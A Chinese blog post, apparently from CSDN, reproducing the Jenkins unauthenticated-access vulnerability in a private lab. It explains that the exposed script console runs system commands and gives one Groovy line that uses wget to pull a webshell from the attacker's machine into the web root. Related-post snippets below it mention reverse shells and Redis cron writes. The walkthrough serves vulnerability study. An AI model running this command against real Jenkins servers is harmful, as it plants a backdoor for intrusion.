Jenkins未授权访问

最新推荐文章于 2024-07-11 17:33:18 发布
最新推荐文章于 2024-07-11 17:33:18 发布
阅读量841 收藏 1
点赞数 2
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/per_se_veran_ce/article/details/102899616
版权

什么是jenkins?

Jenkins是一个开源软件项目,是基于Java开发的一种持续集成工具,用于监控持续重复的工作,旨在提供一个开放易用的软件平台,使软件的持续集成变成可能。

Jenkins功能是什么?

持续的软件版本发布/测试项目。
监控外部调用执行的工作。

什么是jenkins未授权管理?

未授权访问管理控制台,可以通过脚本命令行执行系统命令。通过该漏洞,可以后台管理服务,通过脚本命令行功能执行系统命令,如反弹shell,wget写webshell文件。

实验环境

服务端rhel:192.168.1.80
客户端kali:192.168.1.184

下载安装jenkins环境
官网:http://mirrors.jenkins.io

在这里插入图片描述在这里插入图片描述

访问192.168.1.80:8080,环境搭建成功

在这里插入图片描述

浏览器访问http://192.168.1.80:8080/manage,可以直接访问

在这里插入图片描述
在这里插入图片描述

执行系统命令

在这里插入图片描述

写马

有可写权限

println “wget http://192.168.1.84/webshell.php -P /var/www/html/”.execute().text

在这里插入图片描述

目标机查看

在这里插入图片描述

蚁剑连接,因为我本台机子上没有php环境,不解析php文件,在此不再演示。

per_se_veran_ce
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
常见授权访问漏洞总结1
08-04
漏洞简介以及危害config set dir /var/spool/cron
Web漏洞-授权访问漏洞
Ays.Ie的博客
03-21 3757
该篇记录了web漏洞-授权访问漏洞的相关知识
Jenkins安装部署与配置
最新发布
Lzcsfg的博客
07-11 3345
Jenkins 是一个开源的自动化服务器,用于持续集成和持续交付/持续部署 (CI/CD)。它支持自动构建、测试和部署软件项目,帮助开发团队快速检测和解决问题,提高开发效率和软件质量。持续集成 (CI):持续交付/持续部署 (CD):插件支持:分布式构建:可视化:代码提交:触发构建:构建和测试:生成构建结果:部署: 关闭防火墙和selinux,进行时间同步。 JDK: 17.0.6Tomacat: 9.0.91 Jenkins: 2.452 Java Archive Downloads - Jav
Jenkins授权访问+命令执行反弹shell(复现)
weixin_54227009的博客
05-22 1548
我们大致了解过皮毛,可以在idea新建项目,经过简单调整格式,本地测试可以运行,浏览器访问发现没有Jenkins没有设置密码,直接就授权进后台了。1、打内网的时候通过fscan扫到了一台Jenkins服务的机子。3.3在Jenkins的脚本命令行执行反弹shell命令。3.2在菱角社区搞一个反弹shell命令在线生成。2、在系统管理->脚本命令行。3.1在kali上设置监听。
Jenkins授权访问+命令执行
m0_49577923的博客
11-11 5852
前言 翻越高山需要迈出一个又一个简单的步伐 一、Jenkins简介 Jenkins是一个独立的、开放源码的自动化服务器,它可以用于自动化与构建、测试、交付或部署软件相关的各种任务。Jenkins是一个CI工具。它可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告 二、Jenkins授权访问 由于Jenkins默认安装的时候管理员安全意识不高,没有配置密码,所以可以导致任意用户授权访问到控制页面并且可以对里面的配置进行修改。 正常页面应该是需
从代码层面分析Jenkins授权访问CVE-2017-1000353
stopys6的博客
09-13 228
/通过上面的ReaderThread.start()方法启动一个线程,ReaderThread为SynchronousCommandTransport类的内部类,在run()方法中,调用ClassicCommandTransport类的read()方法读取输入,read()方法实际是调用Command类的readFrom()方法读取,通过反序列化输入返回一个Command对象。在 run() 方法中,使用一个循环来读取通道中的命令,直到通道被关闭为止。
jenkins老版本资源
11-09
应定期更新其安全补丁,并限制对 Jenkins 服务器的访问权限,避免授权的用户进行操作。同时,监控 Jenkins 的日志,及时发现并处理潜在的安全问题。 综上所述,这个压缩包为那些需要使用 Jenkins 老版本的用户...
99-web漏洞挖掘之授权访问漏洞1
08-03
授权访问漏洞】是指那些本应受到安全配置或权限认证保护的系统资源或服务,由于配置不当,允许任何用户经身份验证即可直接访问。这种漏洞可能导致敏感信息泄露、重要功能被恶意操作,严重威胁企业的数据安全。...
Extending Jenkins
05-16
Jenkins 提供了角色基的访问控制(RBAC)和矩阵权限管理,确保只有授权用户能执行特定操作。插件如 Matrix Authorization Strategy 和 LDAP 插件可以帮助加强安全设置。 7. **云集成** Jenkins 支持与多种云平台...
Jenkins 2.387.3
05-28
这些功能确保了只有授权用户才能访问和操作Jenkins实例。 **总结** Jenkins 2.387.3作为Windows平台的自动化部署工具,以其强大的插件生态、灵活的配置选项和高效的自动化流程,成为了软件开发团队不可或缺的一部分...
【漏洞挖掘】——93、Jenkis授权访问
Fly_鹏程万里
06-17 109
默认情况下 Jenkins面板中用户可以选择执行脚本界面来操作一些系统层命令,攻击者可通过授权访问漏洞或者暴力破解用户密码等进入后台管理服务,通过脚本执行界面从而获取服务器权限。
授权访问Jenkins授权访问漏洞
qq_68163788的博客
05-10 1554
enkins是一个流行的开源持续集成和持续交付工具,用于自动化软件开发过程中的构建、测试和部署。然而,Jenkins存在一个授权访问漏洞,即攻击者可以通过授权的方式访问Jenkins服务器,可能导致敏感信息泄露、恶意代码执行等安全风险。攻击者可以利用这个漏洞来获取对Jenkins服务器的控制权,进而破坏软件构建过程,篡改部署流程或者窃取敏感数据。为了防范此类漏洞,管理员应该及时更新Jenkins软件版本、配置访问控制策略、监控系统日志等措施来加强安全防护。
Jenkins授权访问漏洞
qq_50854662的博客
07-08 1820
Jenkins授权访问漏洞
Jenkins授权访问漏洞&命令执行
qq_45434762的博客
03-28 9244
Jenkins授权访问漏洞环境准备下载安装包,版本1.620.1.1.norachwget http://archives.jenkins-ci.org/redhat/jenkins-1...
从代码层面分析Jenkins授权访问CVE-2017-100035333
woshiyanfu的博客
09-22 117
/通过上面的ReaderThread.start()方法启动一个线程,ReaderThread为SynchronousCommandTransport类的内部类,在run()方法中,调用ClassicCommandTransport类的read()方法读取输入,read()方法实际是调用Command类的readFrom()方法读取,通过反序列化输入返回一个Command对象。在 run() 方法中,使用一个循环来读取通道中的命令,直到通道被关闭为止。
jenkins授权rce windows主机getshell
m0_46689007的博客
12-11 1376
由于windows环境,反弹shell不方便,试一下远程下载命令,这里面可以用powershell执行下载命令,从上面我们知道的web绝对路径,下载到根目录下。应该是环境原因连接不了webshell,试试windows环境下的反弹shell,因为目标主机可以执行下载命令,我们下载一个nc,访问存在,上传成功。查看”/dashboard/phpinfo.php”,为phpinfo页面,发现为win10系统,win10基本存在Windows Definder。ip先扫一下全端口,发现只有22,80,443。
授权访问漏洞汇总
weixin_46137328的博客
09-23 7541
本文共11695个字,可以先收藏后看。漏洞概览: Elasticsearch授权访问漏洞 Hadoop授权访问漏洞 Jenkins授权访问 MongoDB授权访问 Zoo...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值